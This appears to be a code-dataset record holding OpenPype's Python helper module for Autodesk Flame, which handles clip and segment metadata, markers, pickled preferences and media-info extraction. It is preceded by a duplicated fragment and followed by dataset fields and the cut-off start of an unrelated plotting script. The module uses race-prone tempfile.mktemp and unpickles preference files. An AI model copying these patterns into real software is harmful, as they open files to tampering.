# `infinite` can be also returned
if isinstance(segment.head, str):
clip_data["segment_head"] = 0
else:
clip_data["segment_head"] = int(segment.head)
if segment.tail:
# `infinite` can be also returned
if isinstance(segment.tail, str):
clip_data["segment_tail"] = 0
else:
clip_data["segment_tail"] = int(segment.tail)
# add all available shot tokens
shot_tokens = _get_shot_tokens_values(segment, [
"<colour space>", "<width>", "<height>", "<depth>", "<segment>",
"<track>", "<track name>"
])
clip_data.update(shot_tokens)
# populate shot source metadata
segment_attrs = [
"record_duration", "record_in", "record_out",
"source_duration", "source_in", "source_out"
]
segment_attrs_data = {}
for attr_name in segment_attrs:
if not hasattr(segment, attr_name):
continue
attr = getattr(segment, attr_name)
segment_attrs_data[attr] = str(attr).replace("+", ":")
if attr_name in ["record_in", "record_out"]:
clip_data[attr_name] = attr.relative_frame
else:
clip_data[attr_name] = attr.frame
clip_data["segment_timecodes"] = segment_attrs_data
return clip_data
def get_clips_in_reels(project):
output_clips = []
project_desktop = project.current_workspace.desktop
for reel_group in project_desktop.reel_groups:
for reel in reel_group.reels:
for clip in reel.clips:
clip_data = {
"PyClip": clip,
"fps": float(str(clip.frame_rate)[:-4])
}
attrs = [
"name", "width", "height",
"ratio", "sample_rate", "bit_depth"
]
for attr in attrs:
val = getattr(clip, attr)
clip_data[attr] = val
version = clip.versions[-1]
track = version.tracks[-1]
for segment in track.segments:
segment_data = get_segment_attributes(segment)
clip_data.update(segment_data)
output_clips.append(clip_data)
return output_clips
def get_reformated_filename(filename, padded=True):
"""
Return the file name with its frame number replaced by a printf-style padding token
Args:
filename (str): file name
Returns:
str: the reformatted file name
Example:
get_reformated_filename("plate.1001.exr") > plate.%04d.exr
"""
found = FRAME_PATTERN.search(filename)
if not found:
log.info("File name is not sequence: {}".format(filename))
return filename
padding = get_padding_from_filename(filename)
replacement = "%0{}d".format(padding) if padded else "%d"
start_idx, end_idx = found.span(1)
return replacement.join(
[filename[:start_idx], filename[end_idx:]]
)
def get_padding_from_filename(filename):
"""
Return padding number from Flame path style
Args:
filename (str): file name
Returns:
int: padding number
Example:
get_padding_from_filename("plate.0001.exr") > 4
"""
found = get_frame_from_filename(filename)
return len(found) if found else None
def get_frame_from_filename(filename):
"""
Return sequence number from Flame path style
Args:
filename (str): file name
Returns:
str: sequence frame number as found in the name, or None
Example:
get_frame_from_filename("plate.0001.exr") > "0001"
"""
found = re.findall(FRAME_PATTERN, filename)
return found.pop() if found else None
@contextlib.contextmanager
def maintained_object_duplication(item):
"""Maintain input item duplication
Attributes:
item (any flame.PyObject): python api object
Yield:
duplicate input PyObject type
"""
import flame
# Duplicate the clip to avoid modifying the original clip
duplicate = flame.duplicate(item)
try:
# do the operation on selected segments
yield duplicate
finally:
# delete the item at the end
flame.delete(duplicate)
@contextlib.contextmanager
def maintained_temp_file_path(suffix=None):
_suffix = suffix or ""
try:
# Store dumped json to temporary file
temporary_file = tempfile.mktemp(
suffix=_suffix, prefix="flame_maintained_")
yield temporary_file.replace("\\", "/")
except IOError as _error:
raise IOError(
"Not able to create temp json file: {}".format(_error))
finally:
# Remove the temporary json
os.remove(temporary_file)
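# Hedged usage sketch of the context manager above (illustration only):
#
#     with maintained_temp_file_path(".json") as tmp:
#         with open(tmp, "w") as f:
#             json.dump({"key": "value"}, f)
#     # the temp file is removed when the block exits
#
# Note that tempfile.mktemp only reserves a name: something must create the
# file inside the block, otherwise the os.remove in the finally clause raises.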
def get_clip_segment(flame_clip):
name = flame_clip.name.get_value()
version = flame_clip.versions[0]
track = version.tracks[0]
segments = track.segments
if len(segments) < 1:
raise ValueError("Clip `{}` has no segments!".format(name))
if len(segments) > 1:
raise ValueError("Clip `{}` has too many segments!".format(name))
return segments[0]
def get_batch_group_from_desktop(name):
project = get_current_project()
project_desktop = project.current_workspace.desktop
for bgroup in project_desktop.batch_groups:
if bgroup.name.get_value() in name:
return bgroup
class MediaInfoFile(object):
"""Class to get media info file clip data
Raises:
IOError: MEDIA_SCRIPT_PATH path doesn't exist
TypeError: Not able to generate clip xml data file
ET.ParseError: Missing clip in xml clip data
IOError: Not able to save xml clip data to file
Attributes:
str: `MEDIA_SCRIPT_PATH` path to flame binary
logging.Logger: `log` logger
TODO: add method for getting metadata to dict
"""
MEDIA_SCRIPT_PATH = "/opt/Autodesk/mio/current/dl_get_media_info"
log = log
_clip_data = None
_start_frame = None
_fps = None
_drop_mode = None
def __init__(self, path, **kwargs):
# replace log if any
if kwargs.get("logger"):
self.log = kwargs["logger"]
# test if the `dl_get_media_info` path exists
self._validate_media_script_path()
# derive other feed variables
self.feed_basename = os.path.basename(path)
self.feed_dir = os.path.dirname(path)
self.feed_ext = os.path.splitext(self.feed_basename)[1][1:].lower()
with maintained_temp_file_path(".clip") as tmp_path:
self.log.info("Temp File: {}".format(tmp_path))
self._generate_media_info_file(tmp_path)
# get clip data and make them single if there is multiple
# clips data
xml_data = self._make_single_clip_media_info(tmp_path)
self.log.debug("xml_data: {}".format(xml_data))
self.log.debug("type: {}".format(type(xml_data)))
# get all time related data and assign them
self._get_time_info_from_origin(xml_data)
self.log.debug("start_frame: {}".format(self.start_frame))
self.log.debug("fps: {}".format(self.fps))
self.log.debug("drop frame: {}".format(self.drop_mode))
self.clip_data = xml_data
@property
def clip_data(self):
"""Clip's xml clip data
Returns:
xml.etree.ElementTree: xml data
"""
return self._clip_data
@clip_data.setter
def clip_data(self, data):
self._clip_data = data
@property
def start_frame(self):
""" Clip's starting frame found in timecode
Returns:
int: number of frames
"""
return self._start_frame
@start_frame.setter
def start_frame(self, number):
self._start_frame = int(number)
@property
def fps(self):
""" Clip's frame rate
Returns:
float: frame rate
"""
return self._fps
@fps.setter
def fps(self, fl_number):
self._fps = float(fl_number)
@property
def drop_mode(self):
""" Clip's drop frame mode
Returns:
str: drop frame flag
"""
return self._drop_mode
@drop_mode.setter
def drop_mode(self, text):
self._drop_mode = str(text)
def _validate_media_script_path(self):
if not os.path.isfile(self.MEDIA_SCRIPT_PATH):
raise IOError("Media Scirpt does not exist: `{}`".format(
self.MEDIA_SCRIPT_PATH))
def _generate_media_info_file(self, fpath):
# Create cmd arguments for generating the xml media info file
cmd_args = [
self.MEDIA_SCRIPT_PATH,
"-e", self.feed_ext,
"-o", fpath,
self.feed_dir
]
try:
# execute creation of clip xml template data
openpype.run_subprocess(cmd_args)
except TypeError as error:
raise TypeError(
"Error creating `{}` due: {}".format(fpath, error))
def _make_single_clip_media_info(self, fpath):
with open(fpath) as f:
lines = f.readlines()
_added_root = itertools.chain(
"<root>", deepcopy(lines)[1:], "</root>")
new_root = ET.fromstringlist(_added_root)
# find the clip which is matching to my input name
xml_clips = new_root.findall("clip")
matching_clip = None
for xml_clip in xml_clips:
if xml_clip.find("name").text in self.feed_basename:
matching_clip = xml_clip
if matching_clip is None:
# return warning there is missing clip
raise ET.ParseError(
"Missing clip in `{}`. Available clips {}".format(
self.feed_basename, [
xml_clip.find("name").text
for xml_clip in xml_clips
]
))
return matching_clip
def _get_time_info_from_origin(self, xml_data):
try:
for out_track in xml_data.iter('track'):
for out_feed in out_track.iter('feed'):
# start frame
out_feed_nb_ticks_obj = out_feed.find(
'startTimecode/nbTicks')
self.start_frame = out_feed_nb_ticks_obj.text
# fps
out_feed_fps_obj = out_feed.find(
'startTimecode/rate')
self.fps = out_feed_fps_obj.text
# drop frame mode
out_feed_drop_mode_obj = out_feed.find(
'startTimecode/dropMode')
self.drop_mode = out_feed_drop_mode_obj.text
break
else:
continue
except Exception as msg:
self.log.warning(msg)
@staticmethod
def write_clip_data_to_file(fpath, xml_element_data):
""" Write xml element of clip data to file
Args:
fpath (string): file path
xml_element_data (xml.etree.ElementTree.Element): xml data
Raises:
IOError: If data could not be written to file
"""
try:
# save it as new file
tree = cET.ElementTree(xml_element_data)
tree.write(
fpath, xml_declaration=True,
method='xml', encoding='UTF-8'
)
except IOError as error:
raise IOError(
"Not able to write data to file: {}".format(error))
| import sys
import os
import re
import json
import pickle
import tempfile
import itertools
import contextlib
import xml.etree.cElementTree as cET
from copy import deepcopy
from xml.etree import ElementTree as ET
from pprint import pformat
from .constants import (
MARKER_COLOR,
MARKER_DURATION,
MARKER_NAME,
COLOR_MAP,
MARKER_PUBLISH_DEFAULT
)
import openpype.api as openpype
log = openpype.Logger.get_logger(__name__)
FRAME_PATTERN = re.compile(r"[\._](\d+)[\.]")
class CTX:
# singleton used for passing data between api modules
app_framework = None
flame_apps = []
selection = None
@contextlib.contextmanager
def io_preferences_file(klass, filepath, write=False):
try:
flag = "w" if write else "r"
yield open(filepath, flag)
except IOError as _error:
klass.log.info("Unable to work with preferences `{}`: {}".format(
filepath, _error))
class FlameAppFramework(object):
# flameAppFramework class takes care of preferences
class prefs_dict(dict):
def __init__(self, master, name, **kwargs):
self.name = name
self.master = master
if not self.master.get(self.name):
self.master[self.name] = {}
self.master[self.name].__init__()
def __getitem__(self, k):
return self.master[self.name].__getitem__(k)
def __setitem__(self, k, v):
return self.master[self.name].__setitem__(k, v)
def __delitem__(self, k):
return self.master[self.name].__delitem__(k)
def get(self, k, default=None):
return self.master[self.name].get(k, default)
def setdefault(self, k, default=None):
return self.master[self.name].setdefault(k, default)
def pop(self, *args, **kwargs):
return self.master[self.name].pop(*args, **kwargs)
def update(self, mapping=(), **kwargs):
self.master[self.name].update(mapping, **kwargs)
def __contains__(self, k):
return self.master[self.name].__contains__(k)
def copy(self): # don"t delegate w/ super - dict.copy() -> dict :(
return type(self)(self)
def keys(self):
return self.master[self.name].keys()
@classmethod
def fromkeys(cls, keys, v=None):
return cls.master[cls.name].fromkeys(keys, v)
def __repr__(self):
return "{0}({1})".format(
type(self).__name__, self.master[self.name].__repr__())
def master_keys(self):
return self.master.keys()
def __init__(self):
self.name = self.__class__.__name__
self.bundle_name = "OpenPypeFlame"
# self.prefs scope is limited to flame project and user
self.prefs = {}
self.prefs_user = {}
self.prefs_global = {}
self.log = log
try:
import flame
self.flame = flame
self.flame_project_name = self.flame.project.current_project.name
self.flame_user_name = flame.users.current_user.name
except Exception:
self.flame = None
self.flame_project_name = None
self.flame_user_name = None
import socket
self.hostname = socket.gethostname()
if sys.platform == "darwin":
self.prefs_folder = os.path.join(
os.path.expanduser("~"),
"Library",
"Caches",
"OpenPype",
self.bundle_name
)
elif sys.platform.startswith("linux"):
self.prefs_folder = os.path.join(
os.path.expanduser("~"),
".OpenPype",
self.bundle_name)
self.prefs_folder = os.path.join(
self.prefs_folder,
self.hostname,
)
self.log.info("[{}] waking up".format(self.__class__.__name__))
try:
self.load_prefs()
except RuntimeError:
self.save_prefs()
# menu auto-refresh defaults
if not self.prefs_global.get("menu_auto_refresh"):
self.prefs_global["menu_auto_refresh"] = {
"media_panel": True,
"batch": True,
"main_menu": True,
"timeline_menu": True
}
self.apps = []
def get_pref_file_paths(self):
prefix = self.prefs_folder + os.path.sep + self.bundle_name
prefs_file_path = "_".join([
prefix, self.flame_user_name,
self.flame_project_name]) + ".prefs"
prefs_user_file_path = "_".join([
prefix, self.flame_user_name]) + ".prefs"
prefs_global_file_path = prefix + ".prefs"
return (prefs_file_path, prefs_user_file_path, prefs_global_file_path)
def load_prefs(self):
(proj_pref_path, user_pref_path,
glob_pref_path) = self.get_pref_file_paths()
with io_preferences_file(self, proj_pref_path) as prefs_file:
self.prefs = pickle.load(prefs_file)
self.log.info(
"Project - preferences contents:\n{}".format(
pformat(self.prefs)
))
with io_preferences_file(self, user_pref_path) as prefs_file:
self.prefs_user = pickle.load(prefs_file)
self.log.info(
"User - preferences contents:\n{}".format(
pformat(self.prefs_user)
))
with io_preferences_file(self, glob_pref_path) as prefs_file:
self.prefs_global = pickle.load(prefs_file)
self.log.info(
"Global - preferences contents:\n{}".format(
pformat(self.prefs_global)
))
return True
def save_prefs(self):
# make sure the preference folder is available
if not os.path.isdir(self.prefs_folder):
try:
os.makedirs(self.prefs_folder)
except Exception:
self.log.info("Unable to create folder {}".format(
self.prefs_folder))
return False
# get all pref file paths
(proj_pref_path, user_pref_path,
glob_pref_path) = self.get_pref_file_paths()
with io_preferences_file(self, proj_pref_path, True) as prefs_file:
pickle.dump(self.prefs, prefs_file)
self.log.info(
"Project - preferences contents:\n{}".format(
pformat(self.prefs)
))
with io_preferences_file(self, user_pref_path, True) as prefs_file:
pickle.dump(self.prefs_user, prefs_file)
self.log.info(
"User - preferences contents:\n{}".format(
pformat(self.prefs_user)
))
with io_preferences_file(self, glob_pref_path, True) as prefs_file:
pickle.dump(self.prefs_global, prefs_file)
self.log.info(
"Global - preferences contents:\n{}".format(
pformat(self.prefs_global)
))
return True
def get_current_project():
import flame
return flame.project.current_project
def get_current_sequence(selection):
import flame
def segment_to_sequence(_segment):
track = _segment.parent
version = track.parent
return version.parent
process_timeline = None
if len(selection) == 1:
if isinstance(selection[0], flame.PySequence):
process_timeline = selection[0]
if isinstance(selection[0], flame.PySegment):
process_timeline = segment_to_sequence(selection[0])
else:
for segment in selection:
if isinstance(segment, flame.PySegment):
process_timeline = segment_to_sequence(segment)
break
return process_timeline
def rescan_hooks():
import flame
try:
flame.execute_shortcut('Rescan Python Hooks')
except Exception:
pass
def get_metadata(project_name, _log=None):
# TODO: can be replaced by MediaInfoFile class method
from adsk.libwiretapPythonClientAPI import (
WireTapClient,
WireTapServerHandle,
WireTapNodeHandle,
WireTapStr
)
class GetProjectColorPolicy(object):
def __init__(self, host_name=None, _log=None):
# Create a connection to the Backburner manager using the Wiretap
# python API.
#
self.log = _log or log
self.host_name = host_name or "localhost"
self._wiretap_client = WireTapClient()
if not self._wiretap_client.init():
raise Exception("Could not initialize Wiretap Client")
self._server = WireTapServerHandle(
"{}:IFFFS".format(self.host_name))
def process(self, project_name):
policy_node_handle = WireTapNodeHandle(
self._server,
"/projects/{}/syncolor/policy".format(project_name)
)
self.log.info(policy_node_handle)
policy = WireTapStr()
if not policy_node_handle.getNodeTypeStr(policy):
self.log.warning(
"Could not retrieve policy of '%s': %s" % (
policy_node_handle.getNodeId().id(),
policy_node_handle.lastError()
)
)
return policy.c_str()
policy_wiretap = GetProjectColorPolicy(_log=_log)
return policy_wiretap.process(project_name)
def get_segment_data_marker(segment, with_marker=None):
"""
Get openpype track item tag created by creator or loader plugin.
Attributes:
segment (flame.PySegment): flame api object
        with_marker (bool)[optional]: if True, the marker object is returned as well
Returns:
dict: openpype tag data
Returns(with_marker=True):
flame.PyMarker, dict
"""
for marker in segment.markers:
comment = marker.comment.get_value()
color = marker.colour.get_value()
name = marker.name.get_value()
if (name == MARKER_NAME) and (
color == COLOR_MAP[MARKER_COLOR]):
if not with_marker:
return json.loads(comment)
else:
return marker, json.loads(comment)
def set_segment_data_marker(segment, data=None):
"""
Set openpype track item tag to input segment.
Attributes:
segment (flame.PySegment): flame api object
Returns:
dict: json loaded data
"""
data = data or dict()
marker_data = get_segment_data_marker(segment, True)
if marker_data:
# get available openpype tag if any
marker, tag_data = marker_data
# update tag data with new data
tag_data.update(data)
# update marker with tag data
marker.comment = json.dumps(tag_data)
else:
# update tag data with new data
marker = create_segment_data_marker(segment)
# add tag data to marker's comment
marker.comment = json.dumps(data)
def set_publish_attribute(segment, value):
""" Set Publish attribute in input Tag object
Attribute:
segment (flame.PySegment)): flame api object
value (bool): True or False
"""
tag_data = get_segment_data_marker(segment)
tag_data["publish"] = value
# set data to the publish attribute
set_segment_data_marker(segment, tag_data)
def get_publish_attribute(segment):
""" Get Publish attribute from input Tag object
Attribute:
segment (flame.PySegment)): flame api object
Returns:
bool: True or False
"""
tag_data = get_segment_data_marker(segment)
if not tag_data:
set_publish_attribute(segment, MARKER_PUBLISH_DEFAULT)
return MARKER_PUBLISH_DEFAULT
return tag_data["publish"]
def create_segment_data_marker(segment):
""" Create openpype marker on a segment.
Attributes:
segment (flame.PySegment): flame api object
Returns:
flame.PyMarker: flame api object
"""
# get duration of segment
duration = segment.record_duration.relative_frame
# calculate start frame of the new marker
start_frame = int(segment.record_in.relative_frame) + int(duration / 2)
# create marker
marker = segment.create_marker(start_frame)
# set marker name
marker.name = MARKER_NAME
# set duration
marker.duration = MARKER_DURATION
# set colour
marker.colour = COLOR_MAP[MARKER_COLOR] # Red
return marker
def get_sequence_segments(sequence, selected=False):
segments = []
# loop versions in sequence
for ver in sequence.versions:
# loop track in versions
for track in ver.tracks:
# ignore all empty tracks and hidden too
if len(track.segments) == 0 and track.hidden:
continue
# loop all segment in remaining tracks
for segment in track.segments:
if segment.name.get_value() == "":
continue
if segment.hidden.get_value() is True:
continue
if (
selected is True
and segment.selected.get_value() is not True
):
continue
# add it to original selection
segments.append(segment)
return segments
@contextlib.contextmanager
def maintained_segment_selection(sequence):
"""Maintain selection during context
Attributes:
sequence (flame.PySequence): python api object
Yield:
list of flame.PySegment
Example:
>>> with maintained_segment_selection(sequence) as selected_segments:
... for segment in selected_segments:
... segment.selected = False
>>> print(segment.selected)
True
"""
selected_segments = get_sequence_segments(sequence, True)
try:
# do the operation on selected segments
yield selected_segments
finally:
# reset all selected clips
reset_segment_selection(sequence)
# select only original selection of segments
for segment in selected_segments:
segment.selected = True
def reset_segment_selection(sequence):
"""Deselect all selected nodes
"""
for ver in sequence.versions:
for track in ver.tracks:
if len(track.segments) == 0 and track.hidden:
continue
for segment in track.segments:
segment.selected = False
def _get_shot_tokens_values(clip, tokens):
old_value = None
output = {}
if not clip.shot_name:
return output
old_value = clip.shot_name.get_value()
for token in tokens:
clip.shot_name.set_value(token)
_key = str(re.sub("[<>]", "", token)).replace(" ", "_")
try:
output[_key] = int(clip.shot_name.get_value())
except ValueError:
output[_key] = clip.shot_name.get_value()
clip.shot_name.set_value(old_value)
return output
def get_segment_attributes(segment):
if segment.name.get_value() == "":
return None
# Add timeline segment to tree
clip_data = {
"shot_name": segment.shot_name.get_value(),
"segment_name": segment.name.get_value(),
"segment_comment": segment.comment.get_value(),
"tape_name": segment.tape_name,
"source_name": segment.source_name,
"fpath": segment.file_path,
"PySegment": segment
}
# head and tail with forward compatibility
if segment.head:
        # `infinite` can also be returned
if isinstance(segment.head, str):
clip_data["segment_head"] = 0
else:
clip_data["segment_head"] = int(segment.head)
if segment.tail:
        # `infinite` can also be returned
if isinstance(segment.tail, str):
clip_data["segment_tail"] = 0
else:
clip_data["segment_tail"] = int(segment.tail)
# add all available shot tokens
shot_tokens = _get_shot_tokens_values(segment, [
"<colour space>", "<width>", "<height>", "<depth>", "<segment>",
"<track>", "<track name>"
])
clip_data.update(shot_tokens)
# populate shot source metadata
segment_attrs = [
"record_duration", "record_in", "record_out",
"source_duration", "source_in", "source_out"
]
segment_attrs_data = {}
for attr_name in segment_attrs:
if not hasattr(segment, attr_name):
continue
attr = getattr(segment, attr_name)
        segment_attrs_data[attr_name] = str(attr).replace("+", ":")
if attr_name in ["record_in", "record_out"]:
clip_data[attr_name] = attr.relative_frame
else:
clip_data[attr_name] = attr.frame
clip_data["segment_timecodes"] = segment_attrs_data
return clip_data
def get_clips_in_reels(project):
output_clips = []
project_desktop = project.current_workspace.desktop
for reel_group in project_desktop.reel_groups:
for reel in reel_group.reels:
for clip in reel.clips:
clip_data = {
"PyClip": clip,
"fps": float(str(clip.frame_rate)[:-4])
}
attrs = [
"name", "width", "height",
"ratio", "sample_rate", "bit_depth"
]
for attr in attrs:
val = getattr(clip, attr)
clip_data[attr] = val
version = clip.versions[-1]
track = version.tracks[-1]
for segment in track.segments:
segment_data = get_segment_attributes(segment)
clip_data.update(segment_data)
output_clips.append(clip_data)
return output_clips
def get_reformated_filename(filename, padded=True):
"""
Return fixed python expression path
Args:
filename (str): file name
Returns:
        str: string with the reformatted path
Example:
get_reformated_filename("plate.1001.exr") > plate.%04d.exr
"""
found = FRAME_PATTERN.search(filename)
if not found:
log.info("File name is not sequence: {}".format(filename))
return filename
padding = get_padding_from_filename(filename)
replacement = "%0{}d".format(padding) if padded else "%d"
start_idx, end_idx = found.span(1)
return replacement.join(
[filename[:start_idx], filename[end_idx:]]
)
def get_padding_from_filename(filename):
"""
Return padding number from Flame path style
Args:
filename (str): file name
Returns:
int: padding number
Example:
get_padding_from_filename("plate.0001.exr") > 4
"""
found = get_frame_from_filename(filename)
return len(found) if found else None
def get_frame_from_filename(filename):
"""
Return sequence number from Flame path style
Args:
filename (str): file name
Returns:
int: sequence frame number
Example:
        get_frame_from_filename("plate.0001.exr") > 0001
"""
found = re.findall(FRAME_PATTERN, filename)
return found.pop() if found else None
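# Quick sketch of how the three filename helpers compose (illustrative
# only; it assumes FRAME_PATTERN is a compiled regex defined elsewhere in
# this module, e.g. something along the lines of re.compile(r"[._](\d+)[.]")):
#
#   get_frame_from_filename("plate.0001.exr")    -> "0001"
#   get_padding_from_filename("plate.0001.exr")  -> 4
#   get_reformated_filename("plate.0001.exr")    -> "plate.%04d.exr"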
@contextlib.contextmanager
def maintained_object_duplication(item):
"""Maintain input item duplication
Attributes:
item (any flame.PyObject): python api object
Yield:
duplicate input PyObject type
"""
import flame
# Duplicate the clip to avoid modifying the original clip
duplicate = flame.duplicate(item)
try:
# do the operation on selected segments
yield duplicate
finally:
# delete the item at the end
flame.delete(duplicate)
@contextlib.contextmanager
def maintained_temp_file_path(suffix=None):
_suffix = suffix or ""
try:
# Store dumped json to temporary file
temporary_file = tempfile.mktemp(
suffix=_suffix, prefix="flame_maintained_")
yield temporary_file.replace("\\", "/")
except IOError as _error:
raise IOError(
"Not able to create temp json file: {}".format(_error))
finally:
# Remove the temporary json
os.remove(temporary_file)
def get_clip_segment(flame_clip):
name = flame_clip.name.get_value()
version = flame_clip.versions[0]
track = version.tracks[0]
segments = track.segments
if len(segments) < 1:
raise ValueError("Clip `{}` has no segments!".format(name))
if len(segments) > 1:
raise ValueError("Clip `{}` has too many segments!".format(name))
return segments[0]
def get_batch_group_from_desktop(name):
project = get_current_project()
project_desktop = project.current_workspace.desktop
for bgroup in project_desktop.batch_groups:
if bgroup.name.get_value() in name:
return bgroup
class MediaInfoFile(object):
"""Class to get media info file clip data
Raises:
        IOError: MEDIA_SCRIPT_PATH path doesn't exist
TypeError: Not able to generate clip xml data file
ET.ParseError: Missing clip in xml clip data
IOError: Not able to save xml clip data to file
Attributes:
str: `MEDIA_SCRIPT_PATH` path to flame binary
logging.Logger: `log` logger
TODO: add method for getting metadata to dict
"""
MEDIA_SCRIPT_PATH = "/opt/Autodesk/mio/current/dl_get_media_info"
log = log
_clip_data = None
_start_frame = None
_fps = None
_drop_mode = None
def __init__(self, path, **kwargs):
# replace log if any
if kwargs.get("logger"):
self.log = kwargs["logger"]
        # test if `dl_get_media_info` path exists
self._validate_media_script_path()
        # derive other feed variables
self.feed_basename = os.path.basename(path)
self.feed_dir = os.path.dirname(path)
self.feed_ext = os.path.splitext(self.feed_basename)[1][1:].lower()
with maintained_temp_file_path(".clip") as tmp_path:
self.log.info("Temp File: {}".format(tmp_path))
self._generate_media_info_file(tmp_path)
            # get the clip data; if the file yields multiple clips,
            # reduce them to the single matching clip
xml_data = self._make_single_clip_media_info(tmp_path)
self.log.debug("xml_data: {}".format(xml_data))
self.log.debug("type: {}".format(type(xml_data)))
# get all time related data and assign them
self._get_time_info_from_origin(xml_data)
self.log.debug("start_frame: {}".format(self.start_frame))
self.log.debug("fps: {}".format(self.fps))
self.log.debug("drop frame: {}".format(self.drop_mode))
self.clip_data = xml_data
@property
def clip_data(self):
"""Clip's xml clip data
Returns:
xml.etree.ElementTree: xml data
"""
return self._clip_data
@clip_data.setter
def clip_data(self, data):
self._clip_data = data
@property
def start_frame(self):
""" Clip's starting frame found in timecode
Returns:
int: number of frames
"""
return self._start_frame
@start_frame.setter
def start_frame(self, number):
self._start_frame = int(number)
@property
def fps(self):
""" Clip's frame rate
Returns:
float: frame rate
"""
return self._fps
@fps.setter
def fps(self, fl_number):
self._fps = float(fl_number)
@property
def drop_mode(self):
""" Clip's drop frame mode
Returns:
str: drop frame flag
"""
return self._drop_mode
@drop_mode.setter
def drop_mode(self, text):
self._drop_mode = str(text)
def _validate_media_script_path(self):
if not os.path.isfile(self.MEDIA_SCRIPT_PATH):
raise IOError("Media Scirpt does not exist: `{}`".format(
self.MEDIA_SCRIPT_PATH))
def _generate_media_info_file(self, fpath):
        # Create cmd arguments for getting the xml clip info file
cmd_args = [
self.MEDIA_SCRIPT_PATH,
"-e", self.feed_ext,
"-o", fpath,
self.feed_dir
]
try:
# execute creation of clip xml template data
openpype.run_subprocess(cmd_args)
except TypeError as error:
raise TypeError(
"Error creating `{}` due: {}".format(fpath, error))
def _make_single_clip_media_info(self, fpath):
with open(fpath) as f:
lines = f.readlines()
_added_root = itertools.chain(
"<root>", deepcopy(lines)[1:], "</root>")
new_root = ET.fromstringlist(_added_root)
        # find the clip matching the input name
xml_clips = new_root.findall("clip")
matching_clip = None
for xml_clip in xml_clips:
if xml_clip.find("name").text in self.feed_basename:
matching_clip = xml_clip
if matching_clip is None:
            # raise an error reporting the missing clip
raise ET.ParseError(
"Missing clip in `{}`. Available clips {}".format(
self.feed_basename, [
xml_clip.find("name").text
for xml_clip in xml_clips
]
))
return matching_clip
def _get_time_info_from_origin(self, xml_data):
try:
for out_track in xml_data.iter('track'):
for out_feed in out_track.iter('feed'):
# start frame
out_feed_nb_ticks_obj = out_feed.find(
'startTimecode/nbTicks')
self.start_frame = out_feed_nb_ticks_obj.text
# fps
out_feed_fps_obj = out_feed.find(
'startTimecode/rate')
self.fps = out_feed_fps_obj.text
# drop frame mode
out_feed_drop_mode_obj = out_feed.find(
'startTimecode/dropMode')
self.drop_mode = out_feed_drop_mode_obj.text
break
else:
continue
except Exception as msg:
self.log.warning(msg)
@staticmethod
def write_clip_data_to_file(fpath, xml_element_data):
""" Write xml element of clip data to file
Args:
fpath (string): file path
xml_element_data (xml.etree.ElementTree.Element): xml data
Raises:
IOError: If data could not be written to file
"""
try:
# save it as new file
tree = cET.ElementTree(xml_element_data)
tree.write(
fpath, xml_declaration=True,
method='xml', encoding='UTF-8'
)
except IOError as error:
raise IOError(
"Not able to write data to file: {}".format(error))
 | en | 0.641196 | # singleton used for passing data between api modules # flameAppFramework class takes care of preferences # don"t delegate w/ super - dict.copy() -> dict :( # self.prefs scope is limited to flame project and user # menu auto-refresh defaults # make sure the preference folder is available # get all pref file paths # TODO: can be replaced by MediaInfoFile class method # Create a connection to the Backburner manager using the Wiretap # python API. # Get openpype track item tag created by creator or loader plugin. Attributes: segment (flame.PySegment): flame api object with_marker (bool)[optional]: if true it will return also marker object Returns: dict: openpype tag data Returns(with_marker=True): flame.PyMarker, dict Set openpype track item tag to input segment. Attributes: segment (flame.PySegment): flame api object Returns: dict: json loaded data # get available openpype tag if any # update tag data with new data # update marker with tag data # update tag data with new data # add tag data to marker's comment Set Publish attribute in input Tag object Attribute: segment (flame.PySegment)): flame api object value (bool): True or False # set data to the publish attribute Get Publish attribute from input Tag object Attribute: segment (flame.PySegment)): flame api object Returns: bool: True or False Create openpype marker on a segment. Attributes: segment (flame.PySegment): flame api object Returns: flame.PyMarker: flame api object # get duration of segment # calculate start frame of the new marker # create marker # set marker name # set duration # set colour # Red # loop versions in sequence # loop track in versions # ignore all empty tracks and hidden too # loop all segment in remaining tracks # add it to original selection Maintain selection during context Attributes: sequence (flame.PySequence): python api object Yield: list of flame.PySegment Example: >>> with maintained_segment_selection(sequence) as selected_segments: ... for segment in selected_segments: ... segment.selected = False >>> print(segment.selected) True # do the operation on selected segments # reset all selected clips # select only original selection of segments Deselect all selected nodes # Add timeline segment to tree # head and tail with forward compatibility # `infinite` can be also returned # `infinite` can be also returned # add all available shot tokens # populate shot source metadata Return fixed python expression path Args: filename (str): file name Returns: type: string with reformated path Example: get_reformated_filename("plate.1001.exr") > plate.%04d.exr Return padding number from Flame path style Args: filename (str): file name Returns: int: padding number Example: get_padding_from_filename("plate.0001.exr") > 4 Return sequence number from Flame path style Args: filename (str): file name Returns: int: sequence frame number Example: def get_frame_from_filename(path): ("plate.0001.exr") > 0001 Maintain input item duplication Attributes: item (any flame.PyObject): python api object Yield: duplicate input PyObject type # Duplicate the clip to avoid modifying the original clip # do the operation on selected segments # delete the item at the end # Store dumped json to temporary file # Remove the temporary json Class to get media info file clip data Raises: IOError: MEDIA_SCRIPT_PATH path doesn't exists TypeError: Not able to generate clip xml data file ET.ParseError: Missing clip in xml clip data IOError: Not able to save xml clip data to file Attributes: str: `MEDIA_SCRIPT_PATH` path to flame binary logging.Logger: `log` logger TODO: add method for getting metadata to dict # replace log if any # test if `dl_get_media_info` paht exists # derivate other feed variables # get clip data and make them single if there is multiple # clips data # get all time related data and assign them Clip's xml clip data Returns: xml.etree.ElementTree: xml data Clip's starting frame found in timecode Returns: int: number of frames Clip's frame rate Returns: float: frame rate Clip's drop frame mode Returns: str: drop frame flag # Create cmd arguments for gettig xml file info file # execute creation of clip xml template data # find the clip which is matching to my input name # return warning there is missing clip # start frame # fps # drop frame mode Write xml element of clip data to file Args: fpath (string): file path xml_element_data (xml.etree.ElementTree.Element): xml data Raises: IOError: If data could not be written to file # save it as new file | 2.073997 | 2 |
newanalysis/plot_performances.py | nriesterer/cogsci-individualization | 0 | 10396 | import sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
if len(sys.argv) != 3:
print('usage: python plot_performances.py <group_csv> <indiv_csv>')
exit()
group_file = sys.argv[1]
indiv_file = sys.argv[2]
# Load the data
df_group = pd.read_csv(group_file)
df_indiv = pd.read_csv(indiv_file)
df = pd.concat([df_group, df_indiv], sort=True)
# Prepare the data for plotting
plot_df = df.groupby(['model', 'id'], as_index=False)['hit'].agg('mean')
mfa_df = plot_df.loc[plot_df['model'] == 'MFA']
mfa_median = mfa_df['hit'].median()
plot_df = plot_df.loc[plot_df['model'] != 'MFA']
# Plot the data
sns.set(style='whitegrid', palette='colorblind')
